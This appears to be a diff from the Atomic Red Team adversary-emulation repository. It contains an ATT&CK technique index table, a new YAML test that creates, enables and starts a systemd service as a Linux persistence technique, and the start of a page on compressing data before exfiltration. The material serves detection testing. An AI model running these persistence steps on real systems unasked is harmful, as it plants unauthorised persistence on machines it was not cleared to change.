| | | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Reflective Code Loading](../../T1620/T1620.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Rogue Domain Controller](../../T1207/T1207.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution](../../T1546/T1546.md) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | [Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [BITS Jobs](../../T1197/T1197.md) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | | | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | | | | | | |
| | | | | Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | | | NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) | | | | | | | |
| | | | | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | | | | | | |
atomics/Indexes/index.yaml
-104427
View File
File diff suppressed because it is too large Load Diff
atomics/RC13378/RC13378.yaml
+73
View File
@@ -0,0 +1,73 @@
---
attack_technique: RC13378
display_name: Systemd Service Creation
atomic_tests:
- name: Create Systemd Service
description: |
This test creates a Systemd service unit file and enables it as a service.
supported_platforms:
- linux
input_arguments:
execstart_action:
description: ExecStart action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstart-marker
execstartpre_action:
description: ExecStartPre action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpre-marker
execstartpost_action:
description: ExecStartPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpost-marker
execreload_action:
description: ExecReload action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execreload-marker
execstop_action:
description: ExecStop action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstop-marker
execstoppost_action:
description: ExecStopPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstoppost-marker
executor:
name: bash
command: |
echo "[Unit]" > /etc/systemd/system/art-systemd-service.service
echo "Description=Atomic Red Team Systemd Service" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Service]" >> /etc/systemd/system/art-systemd-service.service
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPre=#{execstartpre_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPost=#{execstartpost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecReload=#{execreload_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStop=#{execstop_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStopPost=#{execstoppost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Install]" >> /etc/systemd/system/art-systemd-service.service
echo "WantedBy=default.target" >> /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
systemctl enable art-systemd-service.service
systemctl start art-systemd-service.service
- name: Cleanup Systemd Test
description: |
This cleans up the remnants of the SystemD service unit file creation test.
supported_platforms:
- linux
executor:
name: bash
command: |
systemctl stop art-systemd-service.service
systemctl disable art-systemd-service.service
rm -rf /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
atomics/T1002/T1002.md
+111
View File
@@ -0,0 +1,111 @@
# T1002 - Data Compressed
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)
- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
- [Atomic Test #3 - Data Compressed - nix - zip](#atomic-test-3---data-compressed---nix---zip)
- [Atomic Test #4 - Data Compressed - nix - gzip Single File](#atomic-test-4---data-compressed---nix---gzip-single-file)
